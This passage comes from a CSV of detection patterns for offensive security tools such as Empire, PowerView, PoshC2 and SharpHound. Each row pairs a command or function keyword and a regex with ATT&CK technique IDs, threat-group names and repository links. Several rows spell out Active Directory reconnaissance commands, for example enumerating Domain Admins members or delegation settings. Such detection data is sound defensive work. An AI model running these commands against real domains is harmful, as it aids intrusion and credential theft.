T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SiteListPassword.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45958"
"*get-delegation *All*",".{0,1000}get\-delegation\s.{0,1000}All.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","45959"
"*get-delegation *Unconstrained*",".{0,1000}get\-delegation\s.{0,1000}Unconstrained.{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","45960"
"*Get-DFSshare*",".{0,1000}Get\-DFSshare.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45961"
"*Get-DiscosdurosGet-PSDrive*",".{0,1000}Get\-DiscosdurosGet\-PSDrive.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","45963"
"*getdllbaseaddress*",".{0,1000}getdllbaseaddress.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45964"
"*get-dodgyprocesses*",".{0,1000}get\-dodgyprocesses.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","45965"
"*Get-DomainAdmins.ps1*",".{0,1000}Get\-DomainAdmins\.ps1.{0,1000}","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","N/A","7","6","502","43","2024-12-20T21:27:24Z","2023-07-22T03:17:58Z","45966"
"*Get-DomainComputer -Ping  | select name,logoncount,descreption,operatingsystem*",".{0,1000}Get\-DomainComputer\s\-Ping\s\s\|\sselect\sname,logoncount,descreption,operatingsystem.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45967"
"*Get-DomainComputer -TrustedToAuth | select name",".{0,1000}Get\-DomainComputer\s\-TrustedToAuth\s\|\sselect\sname","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45968"
"*Get-DomainDFSshare*",".{0,1000}Get\-DomainDFSshare.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45970"
"*Get-DomainDFSShareV1*",".{0,1000}Get\-DomainDFSShareV1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45971"
"*Get-DomainDFSShareV2*",".{0,1000}Get\-DomainDFSShareV2.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45972"
"*Get-DomainFileServer*",".{0,1000}Get\-DomainFileServer.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45973"
"*Get-DomainForeignGroupMember*",".{0,1000}Get\-DomainForeignGroupMember.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","45974"
"*Get-DomainForeignUser*",".{0,1000}Get\-DomainForeignUser.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45975"
"*Get-DomainGPOComputerLocalGroupMapping*",".{0,1000}Get\-DomainGPOComputerLocalGroupMapping.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45976"
"*Get-DomainGPOUserLocalGroupMapping*",".{0,1000}Get\-DomainGPOUserLocalGroupMapping.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45977"
"*Get-DomainGPOUserLocalGroupMapping*",".{0,1000}Get\-DomainGPOUserLocalGroupMapping.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45978"
"*Get-DomainGroupMember -Identity ""Domain Admins"" |*",".{0,1000}Get\-DomainGroupMember\s\-Identity\s\""Domain\sAdmins\""\s\|.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45979"
"*Get-DomainGroupMemberDeleted*",".{0,1000}Get\-DomainGroupMemberDeleted.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","45980"
"*Get-DomainManagedSecurityGroup*",".{0,1000}Get\-DomainManagedSecurityGroup.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45981"
"*Get-DomainObjectACL -*",".{0,1000}Get\-DomainObjectACL\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","powerview.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45982"
"*Get-DomainSearcher*",".{0,1000}Get\-DomainSearcher.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","45983"
"*GetDomainsForEnumeration*",".{0,1000}GetDomainsForEnumeration.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","45984"
"*Get-DomainSpn*",".{0,1000}Get\-DomainSpn.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 